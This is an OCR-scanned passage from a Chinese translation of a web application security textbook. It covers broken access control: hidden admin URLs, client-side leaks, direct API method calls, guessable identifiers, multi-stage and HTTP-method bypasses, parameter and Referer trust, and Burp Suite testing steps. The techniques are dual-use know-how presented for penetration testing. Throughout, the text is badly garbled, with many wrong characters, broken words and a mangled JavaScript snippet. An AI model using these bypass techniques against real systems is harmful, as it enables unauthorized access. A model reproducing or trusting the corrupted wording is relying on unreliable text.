
在 我 们 已 经 描述 的 示例 中 , 不 完善 的 访问 控制 使 获得 某 种 用 户 权 限 的 攻击 者 能 够 执行 未 授权 
操作 或 访问 未 授权 数据 。 但 是 , 在 最 严重 的 情况 下 ,不 完善 的 访问 控制 可 能 允许 完全 未 获 授 权 的 
用 户 访问 只 有 特权 用 户 才能 访问 的 功能 或 数据 。 


8.1.1 完全 不 受 保护 的 功能 


在 许多 的 访问 控制 不 完善 情况 下 ,敏感 功能 和 数据 可 被 任何 知道 相关 URL 的 用 户 访 问 , 例 如 ， 
在 许多 应 用 程序 中 ， 任 何人 只 需 访问 一 个 特定 的 URL 就 能 够 完全 欣 制 它 的 管理 功能 : 

https://wahh-app.com/agdmin/ 

在 这 种 情况 下 ,应 用 程序 通 弟 仅 实施 如 下 访问 控制 : 以 管理 员 吴 份 登录 的 用 户 在 他 们 的 用 户 
界面 上 看 到 一 个 该 URL 的 链接 ,而 其 他 用 户 则 无 法 看 到 这 个 链接 。 这 种 细微 的 差别 是 应 用 程序 用 
于 “防止 ”敏感 功能 被 未 授权 使 用 的 唯一 机 制 。 

有 时 候 ， 人 允许 用 户 访问 强大 功能 的 URL 可 能 很 难 猜 测 ， 甚 至 可 能 相当 隐秘 ， 例 如 : 

https://wahh-app.com/menus/secure/ff457/DoAdminMenu2 .JsP 

这 种 情况 下 , 开发 者 假设 攻击 者 无 法 知道 或 发 现 这 个 URL， 管 理 功 能 就 会 因此 受到 保护 。 当 
然 ， 局 外 人 很 难 攻 破 一 个 应 用 程序 ， 因 为 他 们 不 太 可 能 猜测 出 实现 这 种 目的 的 URL。 
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错误 观点 “ 低 权 限 用 户 并 不 知道 那个 URL。 我 们 并 没有 在 应 用 程序 中 引用 它 。” 
在 前 面 的 示例 中 ， 无论 URL 是 否 容 易 猿 测 ， 不 存在 任何 真正 的 访问 控制 仍然 等 同 
于 一 个 严重 的 漏洞 。 不 管 是 在 应 用 程序 还 是 在 用 户 手 中 ，URL 都 不 具有 保密 性 。 它 们 


显示 在 屏幕 上 ， 出 现在 浏览 器 历史 记录 与 Web 服务 器 和 代理 服务 器 的 日 志 中 。 用 户 可 
能 会 记 下 它们 ， 以 它们 为 书签 或 通过 电子 邮件 将 其 四 处 传播 。 与 冤 码 不 同 ， 它 们 一 般 
不 需要 定期 修改 。 当 用 户 的 工作 职位 发 生 改 变 、 需 要 收回 他 们 的 管理 权限 时 ， 我 们 并 
没有 办 法 从 他 们 的 记忆 中 删除 某 个 特殊 的 URL。 











一 些 应 用 程序 的 敏感 功能 隐藏 在 各 种 不 太 容 易 猜 测 的 URL 之 后 , 但 攻击 者 通过 仔细 检查 客户 
端 代码 仍 能 发 现 这 些 URL。 许多 应 用 程序 使 用 JavaScript 在 客户 端 动 态 建立 用 户 界 面 。 它 一 般 建 立 
各 种 与 用 户 状 态 有 关 的 标记 ， 然 后 根据 这 些 标记 在 用 户 界面 (UI ) 中 增加 不 同 的 元 素 。 例 如 


var lsAdmin = false: 











if (isAdmin,) 
{ 
adminMenu.addItem("/menus/secure/ff457/addNewPortalUser2.jsp", 
"create a new usSer"),;} 


} 

在 这 个 示例 中 , 攻击 者 只 需 检查 JavaScript 代 人 码 就 可 确定 具备 省 理 功 能 的 URL, 并 演 试 访问 它 
们 。 在 其 他 情况 下 ，HTML 注 释 中 可 能 包含 屏幕 显示 内 容 中 没有 链接 的 URL 的 引用 或 线索 。 请 参 
阅 第 4 章 了 解 攻击 者 收集 应 用 程序 中 隐藏 内 容 信息 时 使 用 的 各 种 技巧 。 

直接 访问 方法 

如 果 应 用 程序 披露 实际 用 于 远程 调用 API 方 法 的 URL 或 参数 ( 通常 它们 由 Java 界 面 披露 )， 这 
时 可 能 出 现 功能 不 受 保护 的 特例 。 在 将 服务 需 端 代码 移 至 浏览 硕 扩 展 组 件 , 并 创建 方法 存根 以 便 
代码 仍然 能 够 调用 它 正 稼 运行 所 需 的 服务 从 端 方法 时 , 往往 会 发 生 这 种 特例 。 除 以 上 情形 外 ,如 
果 URL 或 参数 使 用 getBalance 和 isExpired 等 标准 Java 命 名 约定 ， 这 时 也 可 能 会 出 现 直 接 调 用 
方法 的 情况 。 

原则 上 , 与 指定 服务 硕 端 脚本 或 其 他 资源 的 请 求 相 比 , 并 不 需要 完全 确保 指定 要 执行 的 服务 
希 端 API 的 请 求 的 安全 。 但 实际 上 ， 这 种 机 制 往 往 包 含 漏洞 。 通 各 ， 客 户 端 直 接 与 服务 硕 端 API 
方法 交互 ， 并 避 开 应 用 程序 的 正常 访问 控制 或 意外 输入 回 量 。 如 果 其 他 功能 从 不 由 Web 应 用 程序 
客户 端 且 接 调 用 ， 则 这 些 功 能 也 可 以 通过 上 述 方法 调用 ， 并 不 受 任 何 控制 的 保护 。 一 般 情 况 下 ， 
用 户 只 需要 能 够 访问 某 些 特定 的 方法 , 但 他 们 却 拥 有 访问 所 有 方法 的 权限 。 出 现 这 种 情况 , 或 者 
是 因为 开发 者 并 不 了 解 用 户 到 底 逢 要 哪些 方法 ,因而 癌 他 们 提供 所 有 方法 的 访问 权限 ; 或 者 是 因 
为 将 用 户 映 射 到 HTTP 服 务 器 的 API 上 默认 提供 访问 所 有 方法 的 权限 。 

以 下 示例 显示 了 如 何 从 接口 securityCheck 中 调用 getcurrentUserRoles 方 法 : 


http://wahh-app.com/public/securityCheck/getCurrentUserRoles 
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在 此 示例 中 ,除了 测试 对 getCurrentUserRoles 方 法 的 访问 控制 外 ,还 应 检查 是 否 存在 其 他 类 似 命 
名 的 方法 , 如 getAllUserRoles、getAllRoles、getAllUsers 科 getCurrentUserPermissions。 


我 们 将 在 本 章 后 面部 分 进一步 讨论 如 何 测试 直接 访问 方法 的 情况 。 
8.1.2 ”基于 标识 符 的 功能 


当 应 用 程序 使 用 一 项 功能 访问 某 个 特殊 的 资源 时 , 被 请 求 资源 的 标识 符 和 常常 以 请 求 参数 的 形 
式 、 在 URL 查 询 字 符 串 或 PosT 请 求 主体 中 提交 给 服务 右 。 例 如 ， 应 用 程序 可 能 使 用 下 面 的 URL 
显示 一 份 属于 某 个 用 户 的 特殊 文档 : 

https://wahh-app.com/ViewDocument .php?docid=128014912C 

拥有 这 份 文档 的 用 户 登 录 后 ， 这 个 URL 的 链接 将 会 在 该 用 户 的 “我 的 文档 ”页 面 显 示 。 其 他 
用 户 无 法 看 到 这 个 链接 。 但 是 ， 如 下 访 问 控制 不 完善 ,那么 请 求 相应 URL 的 任何 用 户 剖 能 够 像 授 
权 用 户 奢 样 查看 这 份 文档 。 





























提示 “当主 应 用 程序 连接 一 个 外 部 系统 或 后 端 组 件 时 通常 会 出 现 这 类 漏洞 。 可 能 很 难 
# 在 使 用 各 种 技术 的 不 同系 统 之 间 共 享 一 个 基于 会 话 的 安全 模型 。 面 对 这 种 问题 ， 开 发 
者 往往 会 避免 使 用 那 种 模型 ， 而 使 用 客户 端 提交 的 参数 做 出 访问 控制 决定 。 

















在 这 个 示例 中 ， 寻 求 获得 未 授权 访问 的 攻击 者 不 仪 需 要 知道 应 用 程序 页 面 的 名 称 ( View- 
Document .php )， 而 且 和 需要 知道 他 想 贾 查看 的 文档 的 标识 人 特 。 有 时 ， 应 用 程序 生成 的 资源 标识 符 
非常 难以 预测 ， 例 如 ， 它 们 可 能 是 随机 选择 的 GUID ( Global Unique Identifier， 全 局 统一 标识 符 )。 
在 其 他 情况 下 ,它们 可 能 很 容易 猜测 ,例如 , 它们 可 能 是 连续 生成 的 数字 。 但 是 ,无 论 是 哪 一 种 情 
况 ， 应 用 程序 都 易于 遭受 攻击 。 如 前 所 述 ，URL 并 不 具有 保密 性 ， 资 源 标 识 符 也 同样 如 此 。 通 常 ， 
和 希望 发 现 其 他 用 户 资源 标识 符 的 攻击 者 可 在 应 用 程序 的 某 个 位 置 找到 这 些 信 息 ， 例 如 访问 日 志 中 。 
即使 在 应 用 程序 的 资源 标识 符 很 难 猜测 的 情况 下 , 如 果 没 有 对 那些 资源 实施 合理 的 访问 控制 , 它们 
仍然 易于 受到 攻击 。 如 果 标 识 符 很 容易 了 预测， 问题 就 会 更 加 严重 ， 也 更 容易 被 攻击 者 所 利用 。 
























































提示 应 用 程序 日 志 通 常 是 一 个 信息 金 矿 ， 其 中 包含 大 量 可 被 用 作 标 识 符 的 数据 项 ， 
可 利用 它们 探查 通过 标识 符 访 问 的 功能 。 应 用 程序 日 志 中 常见 的 标识 符 包 括 : 用 户 名 、 
用 户 ID、 账 号 、 文 档 ID、 用 户 群 组 与 角色 以 及 电子 邮件 地 址 。 


注解 ” 除 用 于 指 代 应 用 程序 中 基于 数据 的 资源 外 ， 这 种 标识 符 还 常用 于 表示 应 用 程序 
功能 。 如 第 4 章 所 述 ， 应 用 程序 可 以 通过 单独 一 个 页 面 提供 各 种 功能 ， 它 接受 一 个 功能 
名 称 或 标识 符 为 参数 。 同 样 ， 在 这 种 情况 下 ， 应 用 程序 也 只 是 在 各 种 类 型 的 用 户 界面 
中 显示 或 隐藏 一 个 特殊 的 URL， 实 施 肤浅 的 访问 控制 。 如 果 攻 击 者 能 够 确定 菜 一 敏感 
功能 的 标识 符 ， 他 就 能 像 拥 有 高 级 权限 的 用 户 一 样 访问 该 功能 。 
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8.1.3 多 阶段 功能 


应 用 程序 的 许多 功能 通过 几 个 阶段 执行 ， 并 在 执行 过 程 中 由 客户 端 问 服务 郁 发 送 许多 请 求 。 
例如 ,添加 新 用 户 功能 可 能 包括 从 用 户 维 护 菜 单 中 选取 这 个 选项 ,从 下 拉 列 表 中 选择 部 门 和 用 户 
职位 ， 然 后 输入 新 用 户 名 、 初 始 密码 和 其 他 信息 。 

许多 应 用 程序 常 第 会 努力 防止 这 种 敏感 功能 被 未 授权 访问 , 但 由 于 其 误解 了 这 种 功能 的 使 用 
方式 ， 因 而 实施 了 不 完善 的 访问 控制 。 

在 前 面 的 示例 中 ,如果 一 名 用 户 试图 加 载 用 户 维 护 亲 单 并 从 中 选取 “添加 新 用 户 ” 选 项 ， 应 
用 程序 就 会 核实 该 用 户 是 否 拥有 必要 的 权限 ， 如 采用 户 未 获 授权 ， 就 阻止 其 进行 访问 。 但 是 ， 如 
末 攻 击 者 直接 进入 核实 用 户 所 属 部 门 和 其 他 细 市 的 阶段 , 可 能 就 没有 有 歼 的 访问 控制 对 其 加 以 限 
制 。 开发 者 认为 ,任何 到 达 验 证 过 程 后 续 阶 段 的 用 户 一 定 已 经 拥有 相关 的 权限 ， 因 为 前 面 的 阶段 
己 经 验证 了 这 些 权 限 。 通 过 这 种 方法 , 任何 应 用 程序 用 户 都 能 够 沫 加 一 个 新 的 管理 用 户 账户 ， 因 
而 完全 控制 整个 应 用 程序 ， 访 问 许 多 其 他 已 经 实施 完善 的 访问 控制 的 功能 。 

即使 在 许多 电子 银行 使 用 的 安全 性 能 很 关键 的 Web 应 用 程序 中 , 我 们 也 曾经 发 现 这 种 类 型 的 漏 
洞 。 在 银行 应 用 程序 中 , 转账 通 肖 包括 儿 个 阶段 , 部 分 原因 是 为 了 防止 用 户 在 请 求 转账 时 无 意 出 错 。 
这 个 多 阶段 过 程 需 要 在 每 个 阶段 收集 各 种 与 用 户 有 关 的 数据 .这 些 数据 在 初次 提交 后 将 接受 严格 检 
查 , 然后 使 用 HTML 表 单字 段 送 交 给 随后 的 阶段 。 但 是 ， 如果 应 用 程序 并 不 在 最 后 阶段 重新 确认 这 
些 数据 , 攻击 者 就 可 能 会 避 开 服务 右 检 查 。 例如 ,应 用 程序 可 能 会 核实 进行 转账 的 来 源 账 户 是 否 属 
于 当前 用 户 , 然后 询问 与 目的 账户 有 关 的 细 市 和 转账 的 金额 如 末 用 户 拦截 这 个 过 程 中 的 最 后 一 个 
POST 请 求 ， 并 修改 来 源 账 号 ， 他 丈 能 实现 水 平权 限 提 升 ， 从 其 他 用 户 的 账户 中 转移 资金 。 


8.1.4 静态 文件 


在 绝 大 多 数 情 况 下 , 用户 部 是 通过 向 在 服务 右上 执行 的 动态 页 面 发 布 请 求 来 访问 受 保护 的 功 
能 和 资源 。 这 时 ,每 个 动态 页 面 负责 执行 适当 的 访问 控制 检查 ， 并 确认 用 户 拥 有 执行 相关 操作 所 
需 的 权限 。 

但 是 ， 有 些 时 候 ， 用 户 会 直接 向 位 于 服务 器 Web 根 目录 下 的 静态 资源 提出 请 求 ， 要 求 访 问 这 
些 受 保护 的 资源 。 例如, 一 个 在 线 出 版 商 允 许 用 户 浏 览 他 的 书籍 目录 并 购买 电子 书 进行 下 载 。 文 
付费 用 后 ， 应 用 程序 就 将 用 户 指 向 以 下 下 载 URL: 

https://wahh-books.com/download/9780636628104.pdf 

因为 这 是 一 个 完全 静态 的 货源 ， 所 以 它 并 不 在 服务 大 上 运行 ， 它 的 内 容 百 接 由 Web 服 务 而 返 
器。 因此 ,资源 日 映 并 不 能 执行 任何 检查 以 确认 提出 请 求 的 用 户 拥 有 必要 的 权限 。 如 来 可 以 通过 
这 种 方式 访问 静态 资源 ， 那 么 这 些 资 源 很 可 能 没有 受到 有 效 的 访问 控制 机 制 的 保护 ， 任 何 知 晓 
URL 命 名 方案 的 人 都 可 以 利用 这 种 缺陷 访问 任何 所 需 的 资源 。 在 上 面 的 示例 中 , 文档 名 称 似乎 是 
一 个 ISBN， 利 用 这 个 信息 ， 攻 击 者 能 够 任意 下 载 由 该 出 版 商 制 作 的 每 一 本 电子 书 。 

菏 些 功能 特别 容易 出 现 这 种 问题 ， 包括 提 供 公 司 年 度 报 表 之 类 静态 文 梢 的 金融 Web 站 点 、 提 
供 可 下 载 二 进 制 代码 的 软件 供应 商 以 及 通过 其 访问 应 用 程序 中 静态 日 志文 件 和 其 他 敏感 数据 的 
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8.1.5 平台 配置 错误 


一 些 应 用 程序 在 Web 服 务 天 或 应 用 程序 平台 层 使 用 控件 来 控制 访问 。 通 总， 应 用 程序 会 根据 
用 户 的 角色 来 限制 对 特定 URL 路 径 的 访问 。 例 如 ， 如 果 用 户 不 属于 “管理 员 ” 组 ， 访 问 /admin 路 
径 的 请 求 可 能 会 遭 到 拒绝 。 原 则 上 ， 这 是 完全 合法 的 访问 控制 方法 。 但是， 如 果 在 配置 平台 级 控 
件 时 出 现 错误 ， 这 时 就 可 能 导致 未 授权 访问 。 

正常 情况 下 ， 平台 级 配置 与 防火 墙 策略 规则 类 似 ， 它 们 基于 以 下 条 件 允 许 或 拒绝 访问 请 求 : 

口 HTTP 请 求 方法 ; 

口 URL 路 人 径 ; 

口 用 户 角 色 。 

如 第 3 章 所 述 ，GET 方 法 的 最 初 目 的 是 检索 信息 ， 而 POST 方 法 的 目的 是 执行 更 改 应 用 程序 的 
数据 或 状态 的 操作 。 

如 果 没 有 小 心 制 定 规则 ， 以 基于 正确 的 HITP 方 法 和 URL 路 径 允 许 访 问 ， 就 可 能 会 导致 未 授 
权 访 问 。 例 如 ， 如 果 用 于 创建 新 用 户 的 管理 功能 使 用 PosT 方 法 ， 平 台 可 能 具有 禁止 PosT 方 法 并 
允许 所 有 其 他 方法 的 拒绝 规则 。 但 是 , 如 有 果 应 用 程序 级 脚本 并 不 验证 针对 此 功能 的 所 有 请 求 是 否 
使 用 PosT 方 法 , 则 攻击 者 就 可 以 通过 使 用 cET 方 法 提交 同一 请 求 来 避 开 这 种 控制 。 由 于 大 多 数 用 
于 检索 请 求 参数 的 应 用 程序 级 API 对 于 请 求 方法 并 无 限制 , 因此 , 攻击 者 只 需要 在 GET 请 求 的 URL 
查询 字符 串 中 提供 所 需 参数 ， 就 可 以 未 授权 使 用 上 述 功 能 。 

令 人 更 加 惊奇 的 是 , 即使 平台 级 规则 拒绝 访问 SET 和 PosT 方 法 , 应 用 程序 仍 有 可 能 易于 受到 
攻击 。 这 是 因为 ,使 用 其 他 HTTP 方 法 的 请 求 可 能 最 终 由 人 处理 cET 和 PosT 请 求 的 相同 应 用 程序 代 
人 码 来 人 处理。HEAD 方 法 就 是 一 个 典型 的 例子 。 根 据 规范 ， 服 务 器 应 使 用 它们 用 于 啊 应 对 应 的 GET 
请 求 的 相同 消息 头 (但 不 包含 消息 主体 ) 来 响应 HEAD 请 求 。 因 此 ， 大 多 数 平台 都 能 够 正确 人 处理 
HEAD 请 求 ， 即 执行 对 应 的 GET 处 理 程序 并 返回 生成 的 HTTP 消 息 涉 。 通 常 ，GET 请 求 可 用 于 执行 
敏感 操作 ， 这 或 者 是 因为 应 用 程序 本 身 将 GET 请 求 用 于 这 一 上 日 的 (与 规范 不 符 ), 或 者 是 因为 它 
并 不 验证 是 否 使 用 了 PosT 方 法 。 如 果 攻 击 者 能 够 使 用 HEAD 请 求 增加 一 个 管理 用 户 账户 ， 那 么 ， 
即使 在 请 求 中 未 收 到 任何 消息 主体 ， 他 仍然 能 够 成 功 实施 攻击 。 

某 些 情况 下 ， 对 于 使 用 无 法 识别 的 HTTP 方 法 的 请 求 ， 平 台 会 直接 将 它们 交 由 GET 请 求 处 理 
程序 处 理 。 在 这 种 情况 下 ， 通 过 在 请 求 中 指定 任意 无 效 的 HTTP 方 法 ， 就 可 以 避 开 拒绝 某 些 指定 
的 HTTP 方 法 的 平台 级 控制 。 

我 们 将 在 第 18 草 中 讨论 Web 应 用 程序 平台 产品 中 包含 此 类 漏洞 的 一 个 特例 。 






















































































8.1.6 访问 控制 方法 不 安全 


一 些 应 用 程序 使 用 一 种 极其 不 安全 的 访问 控制 模型 , 基于 客户 剖 提 交 的 请 求 参数 或 受 攻击 者 
控制 的 其 他 条 件 做 出 访问 控制 决定 。 
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1. 基于 参数 的 访问 控制 

在 一 些 这 种 模型 中 ,应 用 程序 在 用 户 登 录 时 决定 用 户 的 角色 或 访问 级 别 , 并 在 登录 后 通过 隐 
单字 段 、cookie 或 者 预先 设 定 的 查询 字符 串 参 数 (参阅 第 $ 草 了 解 相 关内 容 ) 由 客户 端 传送 这 
息 。 应 用 程序 在 处 理 随后 请 求 的 过 程 中 读 取 这 个 请 求 参 数 ， 并 为 用 户 分 配 相 应 的 访问 级 别 。 
例如 ， 使 用 应 用 程序 的 管理 员 将 看 到 以 下 URL: 
https://wahh-app.com/login/home.jsp?admin=true 

但 普通 用 户 看 到 的 URL 中 包含 一 个 不 同 的 参数 , 或 者 根本 不 包含 任何 参数 。 任何 知道 分 配给 管理 
员 的 参数 的 用 户 只 需 在 他 自己 的 请 求 中 使 用 这 个 参数 ， 就 可 以 访问 管理 功能 。 

有 时 候 ， 如果 不 以 高 级 权限 用 户 的 身份 实际 使 用 应 用 程序 , 并 确定 在 使 用 过 程 中 提出 了 哪些 
请 求 ， 这 种 类 型 的 访问 控制 可 能 很 难 探 测 出 来 。 作 为 普通 用 户 ， 我 们 可 以 使 用 在 第 4 草 讨 论 的 如 
何 发 现 隐 藏 请 求 参 数 的 技巧 成 功 查 明 这 种 机 制 。 

2. 基于 Referer 的 访问 控制 

在 其 他 不 安全 的 访问 控制 模型 中 ， 应 用 程序 使 用 HTTP Referer 消 息 头 做 出 访问 控制 决定 。 
例如 ， 应 用 程序 可 能 会 根据 用 户 的 权限 ， 严格 控制 用 户 访 问 主 维护 羡 单 。 但是， 如 果 某 名 用 户 提 
出 请 求 ， 要 求 访问 某 项 管理 功能 , 应 用 程序 可 能 只 是 检查 该 请 求 是 否 由 管理 沫 单 页 面 提出 ， 如 果 
确实 由 该 页 面 提 出 ， 即 认为 该 用 户 一 定 已 经 访问 过 那个 页 面 , 并 因此 已 经 拥有 了 必要 的 权限 。 当 
然 , 从 本 质 上 讲 , 这 种 模型 并 不 安全 , 因为 Referezr 消 息 头 完全 由 用 户 控 制 , 并 可 设 定 为 任何 值 。 

3. 基于 位 置 的 访问 控制 

许多 公司 都 具有 管理 或 业务 要 求 , 根据 用 户 的 地 理 位 置 限制 对 资源 的 访问 。 这些 公 司 不 仪 包 
括 金 融 机 构 ， 还 包括 新 闻 服 务 及 其 他 部 门 。 在 这 些 情 况 下 ,公司 会 采用 各 种 方法 来 确定 用 户 的 位 
置 ， 其 中 最 稼 用 的 是 用 户 当 前 下地 址 的 地 理 位 置 。 

攻击 者 能 够 轻易 突破 基于 位 置 的 访问 控制 。 以 下 是 一 些 稼 用 的 方法 : 

口 使 用 位 于 所 需 位 置 的 Web 代 理 服务 硕 ; 

口 使 用 在 所 和 需 位 置 终止 的 VPN; 

口 使 用 支持 数据 漫游 的 移动 设备 ; 

口 百 接 修 改 洛 户 端 用 于 确定 地 理 位 置 的 机 制 。 


8.2 攻击 访问 控制 


在 开始 探查 应 用 程序 、 检 测 任何 实 际 的 访问 控制 漏洞 之 前 , 渗透 测试 员 应 该 花 一 些 时 间 检 查 
解析 应 用 程序 过 程 中 得 到 的 结果 ( 请 参阅 第 4 章 了 解 相 关内 容 )， 了解 应 用 程序 在 访问 控制 方面 的 
实际 要 求 ， 从 而 决定 探查 哪些 内 容 可 以 得 到 最 令 人 满意 的 结果 。 
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渗透 测试 步 又 





在 分 析 应 用 程序 的 访问 控制 机 制 时 ， 需 要 考虑 以 下 问题 。 
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(1) 应 用 程序 的 功能 是 否 允 许 用 户 访问 属于 他 们 的 特定 数据 ? 

(2) 是 否 存 在 各 种 级 别 的 用 户 ， 如 经 理 、 主 管 、 贵 宾 等 ， 是 否 允 许 他 们 访问 不 同 的 功能 ? 
(3) 管理 员 是 否 使 用 内 置 在 相同 应 用 程序 中 、 以 对 其 进行 配置 和 监控 的 功能 ? 

(4) 发 现 应 用 程序 的 哪些 功能 或 数据 资源 最 有 可 能 带 助 攻击 者 提升 当前 的 权限 ? 

(5) 是 否 存 在 任何 标识 符 ( 以 PosT 消 息 体 的 URL 参 数 的 方式 ) 表明 正 使 用 某 一 参数 追踪 访 


问 控制 级 别 ? 



































8.2.1 ”使 用 不 同 用 尸 账 尸 进行 测试 


测试 应 用 程序 的 访问 控制 效率 的 最 简单 、 最 有 效 的 方法 ,是 使 用 其 他 账户 访问 应 用 程序 。 这 
样 你 就 可 以 确定 ， 可 由 一 个 账户 合法 访问 的 资源 和 功能 是 否 能 够 由 邦 一 个 账户 非法 访问 。 




















渗透 测试 步 又 
(1) 如 有 果 应 用 程序 隔离 用 户 对 不 同 级别 的 功能 的 访问 ， 可 以 首先 使 用 一 个 权限 较 高 的 账户 
确定 所 有 可 用 的 功能 ， 然 后 使 用 权限 较 低 的 账户 访问 这 些 功 能 ,测试 能 否 垂 下 提升 权限 。 




















(2) 如 有 果 应 用 程序 隔离 用 户 对 不 同 资源 ( 如 文档 ) 的 访问 ， 可 以 使 用 两 个 不 同 的 用 户 级 账 
尸 测 试 访问 控制 是 否 有 效 , 或 者 是 否 可 以 水 平 提升 权限 。 例如 ,找到 一 个 一 名 用 户 可 以 合法 访 
问 , 但 为 一 名 用 户 不 能 合法 访问 的 文档 , 然后 尝试 使 用 第 二 名 用 户 的 账户 访问 该 文档 一 一 通过 
请 求 相关 URL 或 在 第 二 名 用 户 的 会 话 中 提交 同样 的 POST 参 数 。 














对 应 用 程序 的 访问 控制 进行 彻 的 测试 需要 耗费 大 量 时 间 。 羡 运 的 是 , 一 些 工具 可 以 帮助 你 日 
完成 有 些 工 作 ， 以 提高 测试 速度 和 可 和 做 性 。 这 样 ， 就 可 以 将 主要 精力 放 在 那些 需要 人 类 智能 才 
高 效 执行 的 任务 上 。 

借助 Burp Suite， 可 以 使 用 两 个 不 同 的 用 户 账 户 来 解析 应 用 程序 的 内 容 。 然 后 ， 可 以 比较 每 


一 名 用 户 访 问 的 内 容 到 底 存 在 哪些 差异 。 





动 
能 











渗透 测试 步 又 


(1) 将 Burp 配 置 为 代理 服务 天 并 茶 用 拦 蕉 ， 以 一 个 用 户 账 户 浏 览 应 用 程序 的 所 有 内 容 。 如 





条 要 测试 垂 和 访问 控制 ， 则 使 用 权限 较 高 的 账户 。 
(2) 检查 Burp 的 站 点 地 图 的 内 容 ， 确 保 已 确定 要 测试 的 所 有 功能 。 然 后 使 用 上 下 文 荣 单 选 
择 “ 比 较 站 点 地 图 ”( compare site maps ) 功能 。 
(3) 要 选择 第 二 个 进行 比较 的 站 点 地 图 ， 可 以 从 Burp 状 态 文件 中 加 载 该 地 图 ， 或 让 Burp 在 
新 会 话 中 动态 重新 请 求 第 一 个 站 点 地 图 。 要 测试 同一 类 型 的 用 户 之 间 的 水 平 访问 控制 , 只 需 加 
载 以 前 保存 的 、 已 将 应 用 程序 映射 为 其 他 用 户 的 状态 文件 。 要 测试 垂直 访问 控制 ， 最 好 是 以 低 
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权限 用 户 壬 份 重新 请 求 蜗 权 限 站 点 地 图 ， 因 为 这 样 可 确保 完全 涵盖 相关 的 功能 。 

(4) 要 在 不 同 的 会 话 中 重新 请 求 第 一 个 站 点 地 图 ， 需 要 使 用 低 权 限 用 户 会 话 的 详细 资料 配 
置 Burp 的 会 话 处 理 功 能 ( 例如， 通过 记录 一 个 登录 安 或 提供 要 在 请 求 中 使 用 的 特定 cookie )。 
我 们 将 在 第 14 章 中 详细 讨论 此 功能 。 还 可 能 需要 定义 适当 的 范围 规则 , 以 防止 Burp 请 求 任何 注 
销 功 能 。 








图 8-1 显 示 了 一 次 简单 站 点 地 图 比较 的 结果 。 其 中 的 深 色 部 分 是 站 点 地 图 之 间 差 异 分 析 的 结 
果 , 这 些 部 分 显示 了 两 个 地 图 之 间 已 添加 、 删 除 或 修改 的 项 目 。 对 于 已 修改 的 项 目 , 该 表格 提供 
了 一 个 “diffcount” 列 ， 其 中 列 出 了 将 第 一 个 地 图 中 的 项 目 修 改 为 第 二 个 地 图 中 的 项 目 所 需 的 编 
辑 次 数 。 而 且 ， 如 果 选 中 一 个 项 目 ， 其 响应 也 以 深 色 显示 ， 以 显示 那些 编辑 在 响应 中 的 位 置 。 

解释 站 点 地 图 比较 的 结果 需要 一 定 的 智慧 ,并 需要 了 解 特定 应 用 程序 功能 的 意义 及 用 法 。 例 
如 ， 图 8-1 显 示 了 在 用 户 查 看 主页 时 返回 给 每 名 用 户 的 响应 。 其 中 的 两 个 啊 应 显示 了 针对 登录 用 
户 的 不 同 说 明 , 而 且 管 理 用 户 拥 有 一 个 额外 的 菜单 项 。 这 些 差异 是 预期 行为 ,它们 与 应 用 程序 访 
问 控制 的 效率 无 天， 因为 它们 只 与 用 户 界面 有 关 。 
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| change options 














图 8-1 显示 以 不 同 用 户 账 户 访问 的 内 容 之 间 的 差异 的 站 点 地 图 比较 





用 户 请 求 顶 级 管理 页 面 时 返回 的 啊 应 如 图 8-2 所 示 。 其 中 显示 ， 管 理 用 户 可 以 看 到 一 个 包含 
可 用 选项 的 荣 单 ， 而 普通 用 户 则 看 到 “未 授权 ”(not authorized ) 消息 。 这 些 差 寞 表明 ， 访 问 控 
制 已 得 到 正确 应 用 。 用 户 请 求 “列举 用 户 ”(list users ) 管理 功能 时 返回 的 响应 如 图 8-3 所 示 。 其 
中 显示 的 两 个 啊 应 完全 相同 , 这 表示 应 用 程序 易于 受到 攻击 ,因为 普通 用 户 不 应 拥有 访问 此 功能 
的 权限 ， 而 且 该 用 户 的 用 户 界面 中 也 没有 任何 指 问 该 功能 的 链接 。 
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图 8-3” 低 权限 用 户 可 以 访 间 用 于 列举 应 用 程序 用 户 的 管理 功能 
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仅仅 通过 分 析 站 点 地 图 树 及 碍 看 项 目 之 间 的 差异 数量 , 并 不 足以 评估 应 用 程序 访问 控制 的 效 
这。 出 现 两 个 完全 相同 的 啊 应 可 能 表示 和 存在 源 洞 ( 例如 ， 在 披露 敏感 信息 的 管理 功能 中 )， 也 可 
能 不 会 导致 任何 危险 〈 例 如 ， 在 不 受 保护 的 搜索 功能 中 )、 相 反 ， 两 个 不 同 的 啊 应 也 有 可 能 表示 
存在 漏洞 〈 例 如 , 在 每 次 访问 都 返回 不 同 内 容 的 管理 功能 中 )， 也 可 能 不 会 导致 任何 危险 (例如 ， 
在 显示 当前 登录 用 户 的 用 户 信息 的 页 面 中 )。 基 于 上 述 原因 ， 在 确定 访问 控制 漏洞 方面 ， 完 全 日 
动 化 的 工具 往往 效率 低下 。 使 用 Burp 的 “站 点 地 图 比较 ”功能 ,可 以 尽 可 能 目 动 完成 确定 漏洞 的 
过 程 ,以 现成 的 格式 获得 所 需 的 全 部 信息 , 同时 应 用 目 己 在 应 用 程序 功能 方面 的 知识 来 确定 任何 
具体 的 漏洞 。 


尝试 访问 
http://mdsec.net/auth/462/ 
http://mdsec.net/auth/468/ 



































8.2.2 测试 多 阶段 过 程 


上 一 市 介绍 的 方法 一 一 比较 通过 不 同 用 户 账户 访问 的 应 用 程序 内 容 一 一 无 法 用 于 测试 菏 些 
多 阶段 过 程 。 在 多 阶段 过 程 中 ,要 执行 茶 个 操作 , 用 户 通 前 需要 以 正确 的 顺序 提出 多 个 请 求 ， 应 
用 程序 则 在 用 户 提 出 请 求 的 同时 创建 有 关 用 户 操 作 的 状态 ,仅仅 重新 请 求 站 点 地 图 中 的 每 一 个 项 
目 , 并 不 能 正确 重复 相关 过 程 , 因此 , 由 于 访问 控制 以 外 的 其 他 原因 , 你 答 试 的 操作 可 能 会 失败 。 

以 添加 新 应 用 程序 用 户 的 管理 功能 为 例 。 该 功能 可 能 涉及 几 个 步 又 , 包括 加 载 用 于 添加 用 户 
的 表单 、 提 有 交 包 含 新 用 户 详 细 资 料 的 表单 、 审 查 用 户 详细 资料 ,以 及 确认 添加 操作 。 菏 些 情况 下 ， 
应 用 程序 可 能 为 会 初始 表单 提供 保护 , 但 没有 为 处 理 表 单 提 交 的 页 面 或 确认 页 面 捉 供 保 护 。 整 个 
过 程 可 能 包含 大 量 请 求 ( 包括 重 定 向 )， 在 以 前 阶段 提交 的 参数 将 在 以 后 通过 客户 端 重 新 传送 。 










































































因此 ， 这 个 过 程 的 每 一 个 步 又 部 需要 单独 进行 测试 ， 以 确认 访问 控制 是 否 得 到 正确 应 用 。 


